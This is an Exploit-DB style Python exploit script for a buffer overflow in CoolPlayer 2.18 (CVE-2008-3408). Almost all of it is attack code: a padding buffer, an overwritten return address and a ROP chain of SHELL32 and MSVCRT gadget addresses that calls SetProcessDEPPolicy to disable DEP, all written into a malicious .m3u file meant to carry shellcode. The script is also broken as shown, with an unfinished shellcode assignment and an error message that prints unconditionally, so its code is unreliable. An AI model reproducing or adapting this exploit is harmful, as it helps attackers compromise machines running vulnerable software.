CoolPlayer 2.18 DEP Bypass - [CVE: 2008-3408]

2011-01-02 14:15:11

# Exploit Title: CoolPlayer 2.18 DEP Bypass
# Date: January 2, 2011
# Author: Blake
# Version: 2.18
# Tested on: Windows XP SP3 running in Virtualbox
# Uses SetProcessDEPPolicy() to disable DEP for the process
# Thanks to mr_me for the encouragement
# Exploit-DB Notes: May not work on all Win XP SP3 machines

print "\n============================"
print "CoolPlayer 2.18 DEP Bypass"
print "Written by Blake"
print "============================\n"

# windows/exec calc.exe 227 bytes - 240 bytes of shellcode space available
shellcode =(

buffer = "\x41" * 220
eip = "\x28\xb0\x9f\x7c" # POP ECX / RETN - SHELL32.DLL 7C9FB028
offset1 = "\x42" * 4
nop = "\x90" * 10

# put zero in EBX
rop = "\xdd\xad\x9e\x7c" # POP EBX / RETN - SHELL32.DLL 7C9EADDD
rop += "\xff\xff\xff\xff" # placed into ebx
rop += "\xe1\x27\xc1\x77" # INC EBX / RETN - MSVCRT.DLL 77C127E1

# set EBP to point to SetProcessDEPPolicy
rop += "\x7b\xa6\x9e\x7c" # POP EBP / RETN - SHELL32.DLL 7C9EA67B
rop += "\xa4\x22\x86\x7c" # address of SetProcessDEPPolicy XP SP3

# set EDI as a pointer to RET (rop nop)
rop += "\x47\xeb\x9e\x7c" # POP EDI / RETN - SHELL32.DLL 7C9EEB47
rop += "\x08\x15\x9c\x7c" # RETN - SHELL32.DLL 7C9C1508

# set ESI as a pointer to RET (rop nop)
rop += "\x4c\x20\x9c\x7c" # POP ESI / RETN - SHELL32.DLL 7C9C204C
rop += "\x51\x20\x9c\x7c" # RETN - SHELL32.DLL 7C9C2051

# set ESP to point at nops
rop += "\x73\x10\xa1\x7c" # PUSHAD / RETN - SHELL32.DLL 7CA11073

print "[*] Creating malicious m3u file"
file = open("exploit.m3u","w")
file.write(buffer + eip + offset1 + rop + nop + shellcode)
print "[*] File created"
print "[x] Error creating file!"

raw_input("\nPress any key to exit...")


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